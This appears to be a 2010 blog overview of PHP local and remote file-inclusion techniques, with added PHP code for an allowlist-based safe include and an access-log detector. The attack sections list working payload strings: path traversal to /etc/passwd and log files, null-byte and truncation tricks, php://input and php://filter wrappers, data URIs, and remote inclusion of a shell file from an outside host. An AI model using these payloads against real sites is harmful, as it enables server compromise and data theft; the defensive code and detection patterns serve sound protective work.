Exploiting PHP File Inclusion – Overview

February 22, 2010

Recently I have seen a lot of questions regarding PHP file inclusions and the possibilities they offer, so I decided to give a small overview. All the tricks have been described in detail elsewhere, but I like to have them summed up in one place.

Basic Local File Inclusion:

<?php include("includes/" . $_GET['file']); ?>
  • Including files in the same directory:
    ?file=.htaccess
  • Path Traversal:
    ?file=../../../../../../../../../var/lib/locate.db
    (this file is interesting because it is the locate database, so it reveals the names of other files on the filesystem)
  • Including injected PHP code:
    ?file=../../../../../../../../../var/log/apache/error.log
    (you can find other possible Apache log directories here and other ways here; think about all possible logfiles, including the ssh auth.log, file uploads, session files, etc.). Temporarily uploaded files might work too. If you additionally have phpinfo() output, read here.

Limited Local File Inclusion:

<?php include("includes/" . $_GET['file'] . ".htm"); ?>
  • Null Byte Injection:
    ?file=../../../../../../../../../etc/passwd%00
    (requires magic_quotes_gpc=off)
  • Directory Listing with Null Byte Injection:
    ?file=../../../../../../../../../var/www/accounts/%00
    (UFS filesystem only, requires magic_quotes_gpc=off, more details here)
  • Path Truncation:
    ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ...
    (more details see here and here)
  • Dot Truncation:
    ?file=../../../../../../../../../etc/passwd................ ...
    (Windows only, more details here)
  • Reverse Path Truncation:
    ?file=../../../../ [...] ../../../../../etc/passwd
    (more details here)
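Against both the basic and the limited local inclusion above, the fix is the same: never build an include path from user input. The following is an added example written for this overview, not code from the original post. The page keys (home, about, contact), the includes/ directory and the function name resolveInclude are assumptions. The allowlist makes traversal, null bytes and the truncation tricks irrelevant, and the realpath() containment check stays in as defence in depth (PHP 5.3.4 and later also reject NUL bytes in include paths, but the code does not rely on that). It needs PHP 7.1 or newer.

```php
<?php
// Added example (not from the original post): a hardened replacement for
//   include("includes/" . $_GET['file'] . ".htm");
// Strategy: map the untrusted name onto a fixed allowlist, then verify the
// resolved path still lives inside the intended directory.
declare(strict_types=1);

// Constructed allowlist: request keys on the left, real files on the right.
// Only these three files can ever be included, whatever the request says.
const PAGE_MAP = [
    'home'    => 'home.htm',
    'about'   => 'about.htm',
    'contact' => 'contact.htm',
];

/**
 * Resolve an untrusted page name to a safe absolute path, or null.
 * Rejects anything not on the allowlist and, as defence in depth, refuses
 * any resolved path outside $baseDir even if the map is later misconfigured
 * (for example with a value containing "../" or a symlink to another dir).
 */
function resolveInclude(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGE_MAP)) {
        return null;                       // not an allowed page name
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                       // include directory missing
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // realpath() canonicalises "..", symlinks and trailing junk and returns
    // false for non-existent paths; the prefix check pins the result to $base.
    $path = realpath($prefix . PAGE_MAP[$requested]);
    if ($path === false || !is_file($path)
        || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$file = $_GET['file'] ?? 'home';

// Reject anything that is not a short plain token before consulting the map
// (also rejects arrays such as ?file[]=x, which would make preg_match warn).
if (!is_string($file) || !preg_match('/\A[a-z0-9_-]{1,32}\z/', $file)) {
    http_response_code(400);
    exit('invalid page');
}

$target = resolveInclude($file, __DIR__ . '/includes');
if ($target === null) {
    http_response_code(404);
    exit('page not found');
}

include $target;
```

Because the request value is only ever used as an array key, no filename, extension or wrapper prefix from the client reaches include() at all; the realpath() check exists so that a later edit to PAGE_MAP cannot silently reopen the hole.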

Basic Remote File Inclusion:

<?php include($_GET['file']); ?>
  • Including Remote Code:
    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt
    (requires allow_url_fopen=On and allow_url_include=On)
  • Using PHP stream php://input:
    ?file=php://input
    (supply the payload in the POST body, watch the URL encoding, details here; requires allow_url_include=On)
  • Using PHP stream php://filter:
    ?file=php://filter/convert.base64-encode/resource=index.php
    (lets you read PHP source because the base64-encoded output won't get evaluated. More details here and here)
  • Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    (requires allow_url_include=On)
  • Using XSS:
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode
    (makes sense if outbound traffic is firewalled or only whitelisted domains are allowed)

Limited Remote File Inclusion:

<?php include($_GET['file'] . ".htm"); ?>
  • ?file=http://websec.wordpress.com/shell
  • ?file=http://websec.wordpress.com/shell.txt?
  • ?file=http://websec.wordpress.com/shell.txt%23
    (requires allow_url_fopen=On and allow_url_include=On)

  • ?file=\\evilshare\shell.php
    (bypasses allow_url_fopen=Off)
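From the defender's side, every variant in the remote sections, as well as the traversal and null-byte forms further up, leaves a recognisable trace in the web server access log. The following is an added example for this overview, not code from the original post: it URL-decodes the query string of each Combined Log Format line and reports which indicator families match. The log lines are constructed, the indicator names are my own, and a match is a triage signal rather than proof of exploitation (legitimate redirect parameters also carry http://). The server-side fix for the remote variants is allow_url_include=Off (and allow_url_fopen=Off where nothing needs it) in php.ini; both are PHP_INI_SYSTEM settings and cannot be switched back on from a script.

```php
<?php
// Added example (not from the original post): classify web-server access log
// lines for the file-inclusion indicators discussed in this overview.
declare(strict_types=1);

// Indicator name => PCRE pattern, matched against the URL-decoded query string.
// Patterns are written in single-quoted PHP strings, so "\\\\" is one regex
// backslash-escape and "\." stays a literal escaped dot.
const INCLUSION_PATTERNS = [
    'path-traversal' => '~\.\.[/\\\\]~',           // "../" or "..\" after decoding
    'null-byte'      => '~\x00~',                  // %00 decoded to a NUL byte
    'php-wrapper'    => '~php://~i',               // php://input, php://filter, ...
    'data-uri'       => '~\bdata:~i',              // data: or data:// wrapper
    'remote-url'     => '~=(?:https?|ftp)://~i',   // a parameter whose value is a URL
    'unc-path'       => '~=[\\\\]{2}~',            // a parameter starting with \\share
    'truncation'     => '~(?:\.[/\\\\]?){16,}~',   // long runs of "." / ".\" / "./"
    'sensitive-file' => '~/etc/passwd|/var/log/|locate\.db~i',
];

/**
 * Return the list of indicator names that match one access log line.
 * An empty array means nothing suspicious was found in the query string.
 */
function inclusionIndicators(string $logLine): array
{
    // Combined Log Format: the quoted request is "METHOD /path?query HTTP/x.y".
    if (!preg_match('~"[A-Z]+ (\S+) HTTP/~', $logLine, $m)) {
        return [];
    }
    $qPos = strpos($m[1], '?');
    if ($qPos === false) {
        return [];                                  // no query string at all
    }
    // One round of percent-decoding: %2e%2e%2f -> ../, %00 -> NUL, %3F -> ?.
    // Double-encoded input (%252e) would need a second pass; one is kept here
    // so that a literal "%25" in a benign value is not over-decoded.
    $query = urldecode(substr($m[1], $qPos + 1));

    $hits = [];
    foreach (INCLUSION_PATTERNS as $name => $pattern) {
        if (preg_match($pattern, $query) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample log lines (RFC 5737 documentation addresses), one benign
// request followed by one request per technique family from the overview.
$sampleLog = [
    '203.0.113.5 - - [22/Feb/2010:10:01:02 +0000] "GET /index.php?file=about HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/Feb/2010:10:01:09 +0000] "GET /index.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 1834',
    '203.0.113.5 - - [22/Feb/2010:10:01:15 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2201',
    '203.0.113.5 - - [22/Feb/2010:10:01:21 +0000] "GET /index.php?file=http://203.0.113.99/shell.txt%3F HTTP/1.1" 500 0',
    '203.0.113.5 - - [22/Feb/2010:10:01:30 +0000] "GET /index.php?file=data://text/plain;base64,SSBsb3ZlIFBIUAo= HTTP/1.1" 200 11',
];

foreach ($sampleLog as $line) {
    $hits = inclusionIndicators($line);
    if ($hits !== []) {
        echo 'ALERT [' . implode(',', $hits) . '] ' . $line . PHP_EOL;
    }
}
```

Run against the sample above, the first line is silent, the second reports path-traversal, null-byte and sensitive-file together, and the remaining three report php-wrapper, remote-url and data-uri respectively. A 200 response paired with a php-wrapper or null-byte hit is the combination worth escalating first, since it means the include succeeded rather than failed.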

Static Remote File Inclusion:

<?php include("http://192.168.1.10/config.php"); ?>
  • Man In The Middle
    (lame indeed, but often forgotten)

Filter Evasion:

  • Access files with wildcards (read more here)

Of course you can combine all the tricks. If you are aware of any other tricks or interesting files to include, please leave a comment and I'll add them.